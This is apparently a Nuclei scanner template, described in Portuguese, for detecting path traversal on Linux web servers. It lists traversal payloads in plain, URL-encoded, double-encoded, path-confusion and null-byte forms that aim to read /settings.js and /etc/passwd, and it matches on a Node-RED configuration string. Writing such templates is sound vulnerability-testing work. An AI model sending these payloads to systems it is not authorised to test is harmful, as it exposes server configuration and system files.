id: linux_settings

info:
  name: Linux Path Traversal - /settings.js (Deep Traversal)_settings.js
  author: xandsz
  severity: medium
  description: |
    Detecta Path Traversal em servidores Linux tentando acessar
    /settings.js usando múltiplos níveis (5+ casas) e variações de encoding.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-22
  metadata:
    max-request: 20
  tags: traversal,lfi,linux

http:
  - method: GET
    path:
      # === 5 níveis ===
      - "{{BaseURL}}/../../../../../settings.js"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/settings.js"
      - "{{BaseURL}}/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../settings.js"

      # === 6 níveis ===
      - "{{BaseURL}}/../../../../../../settings.js"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

      # === 7 níveis ===
      - "{{BaseURL}}/../../../../../../../settings.js"
      - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

      # === 8 níveis ===
      - "{{BaseURL}}/../../../../../../../../settings.js"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

      # === Double encoding profundo ===
      - "{{BaseURL}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/settings.js"

      # === Mixed encoding ===
      - "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"

      # === Path confusion ===
      - "{{BaseURL}}/....//....//....//settings.js"
      - "{{BaseURL}}/..././..././..././settings.js"

      # === Null byte ===
      - "{{BaseURL}}/../../../../../settings.js%00"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "http://nodejs.org/api/https.html#https_https_createserver_options_requestlistener"

      - type: status
        status:
          - 200
